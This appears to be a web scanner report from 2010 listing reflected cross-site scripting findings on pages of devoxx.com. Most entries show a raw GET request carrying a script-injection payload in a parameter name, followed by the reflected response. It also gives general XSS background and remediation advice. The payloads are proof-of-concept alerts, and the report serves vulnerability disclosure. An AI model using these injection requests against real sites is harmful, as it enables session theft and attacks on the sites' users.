Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://devoxx.com/display/Devoxx2K10/Contact+Us [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Contact+Us
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6c9c5--><script>alert(1)</script>329e4ea39cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Contact+Us?6c9c5--><script>alert(1)</script>329e4ea39cd=1 HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:42:40 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842960278 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 35864
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Contact+Us?6c9c5--><script>alert(1)</script>329e4ea39cd=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@381c692d adaptavist.builder.helper: com.atlass ...[SNIP]...
1.2. http://devoxx.com/display/Devoxx2K10/Devoxx+2008 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Devoxx+2008
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload cecbd--><script>alert(1)</script>01ad4165a5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Devoxx+2008?cecbd--><script>alert(1)</script>01ad4165a5a=1 HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:43:26 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289843006197 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 140846
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Devoxx+2008?cecbd--><script>alert(1)</script>01ad4165a5a=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@1380179f adaptavist.builder.helper: com.atlass ...[SNIP]...
1.3. http://devoxx.com/display/Devoxx2K10/Devoxx+2009 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Devoxx+2009
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4b156--><script>alert(1)</script>9c82cd46bd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Devoxx+2009?4b156--><script>alert(1)</script>9c82cd46bd5=1 HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:44:30 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289843070377 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 174350
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Devoxx+2009?4b156--><script>alert(1)</script>9c82cd46bd5=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@2821886c adaptavist.builder.helper: com.atlass ...[SNIP]...
The value of the a8f51--><script>alert(1)</script><H1>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM</H1> request parameter is copied into the HTML document as plain text between tags. The payload 92591<script>alert(1)</script>ed41ee64bf1 was submitted in the a8f51--><script>alert(1)</script><H1>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM</H1> parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the a8f51--><script>alert(1)</script><font%20color request parameter is copied into the name of an HTML tag. The payload 8b688><script>alert(1)</script>a75c5490369 was submitted in the a8f51--><script>alert(1)</script><font%20color parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the a8f51--><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM request parameter is copied into the HTML document as plain text between tags. The payload b0d96<script>alert(1)</script>c9b2c36aef6 was submitted in the a8f51--><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the a8f51--><script>alert(1)</script>db69e0aef33 request parameter is copied into the HTML document as plain text between tags. The payload f89e1<script>alert(1)</script>3201c43307f was submitted in the a8f51--><script>alert(1)</script>db69e0aef33 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:35:56 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842556120 Vary: User-Agent Content-Type: text/html;charset=UTF-8 Content-Length: 38411
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; ...[SNIP]... </script>db69e0aef33=1f89e1<script>alert(1)</script>3201c43307f' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@2db3dffd adaptavist.builder.helper: com.atlassia ...[SNIP]...
1.8. http://devoxx.com/display/Devoxx2K10/Home [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Home
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 10455--><script>alert(1)</script>0b98aba86be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:36:15 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842575740 Vary: User-Agent Content-Type: text/html;charset=UTF-8 Content-Length: 38370
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; ...[SNIP]... 727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Home?10455--><script>alert(1)</script>0b98aba86be=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@555cc586 adaptavist.builder.helper: com.atlass ...[SNIP]...
1.9. http://devoxx.com/display/Devoxx2K10/Javaholics [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Javaholics
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5079f--><script>alert(1)</script>6c6c8244915 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Javaholics?5079f--><script>alert(1)</script>6c6c8244915=1 HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:40:26 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842826176 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 131053
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Javaholics?5079f--><script>alert(1)</script>6c6c8244915=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@219107ac adaptavist.builder.helper: com.atlass ...[SNIP]...
1.10. http://devoxx.com/display/Devoxx2K10/Jboss [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Jboss
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 579a4--><script>alert(1)</script>b3f778dd671 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Jboss?579a4--><script>alert(1)</script>b3f778dd671=1 HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:42:10 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842930541 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 35549
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Jboss?579a4--><script>alert(1)</script>b3f778dd671=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@28c0e5ed adaptavist.builder.helper: com.atlass ...[SNIP]...
1.11. http://devoxx.com/display/Devoxx2K10/News [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/News
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 35f79--><script>alert(1)</script>b25f2783080 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/News?35f79--><script>alert(1)</script>b25f2783080=1 HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:40:12 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842812010 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 38188
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/News?35f79--><script>alert(1)</script>b25f2783080=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@3a01ab9c adaptavist.builder.helper: com.atlass ...[SNIP]...
1.12. http://devoxx.com/display/Devoxx2K10/Newsletter [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Newsletter
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4c08e--><script>alert(1)</script>092395d5d3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Newsletter?4c08e--><script>alert(1)</script>092395d5d3c=1 HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:42:27 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842947522 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 37934
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Newsletter?4c08e--><script>alert(1)</script>092395d5d3c=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@305a36d4 adaptavist.builder.helper: com.atlass ...[SNIP]...
1.13. http://devoxx.com/display/Devoxx2K10/Oracle [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Oracle
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a2a9c--><script>alert(1)</script>b30a96574db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Oracle?a2a9c--><script>alert(1)</script>b30a96574db=1 HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:42:20 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842940633 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 35040
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Oracle?a2a9c--><script>alert(1)</script>b30a96574db=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@4caf8a0c adaptavist.builder.helper: com.atlass ...[SNIP]...
1.14. http://devoxx.com/display/Devoxx2K10/Partners [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Partners
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e7bf9--><script>alert(1)</script>834c95c00a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Partners?e7bf9--><script>alert(1)</script>834c95c00a5=1 HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:40:04 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842804782 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 34094
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Partners?e7bf9--><script>alert(1)</script>834c95c00a5=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@b64716e adaptavist.builder.helper: com.atlassi ...[SNIP]...
1.15. http://devoxx.com/display/Devoxx2K10/Practical [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Practical
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 87fb1--><script>alert(1)</script>fa619441419 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Practical?87fb1--><script>alert(1)</script>fa619441419=1 HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:40:12 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842812479 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 35083
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Practical?87fb1--><script>alert(1)</script>fa619441419=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@7e6b6109 adaptavist.builder.helper: com.atlass ...[SNIP]...
1.16. http://devoxx.com/display/Devoxx2K10/Privacy+Policy [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Privacy+Policy
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 77c41--><script>alert(1)</script>111adc9d0f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Privacy+Policy?77c41--><script>alert(1)</script>111adc9d0f1=1 HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:42:40 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842960557 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 41989
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Privacy+Policy?77c41--><script>alert(1)</script>111adc9d0f1=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@7874036d adaptavist.builder.helper: com.atlass ...[SNIP]...
1.17. http://devoxx.com/display/Devoxx2K10/Schedule [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Schedule
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 94dc9--><script>alert(1)</script>2d39d89cec9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Schedule?94dc9--><script>alert(1)</script>2d39d89cec9=1 HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:40:10 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842810669 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 38725
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Schedule?94dc9--><script>alert(1)</script>2d39d89cec9=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@758d7c42 adaptavist.builder.helper: com.atlass ...[SNIP]...
1.18. http://devoxx.com/display/Devoxx2K10/Schedule+REST+interface [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Schedule+REST+interface
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8b508--><script>alert(1)</script>c8a72497573 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Schedule+REST+interface?8b508--><script>alert(1)</script>c8a72497573=1 HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:41:29 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842889847 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 75562
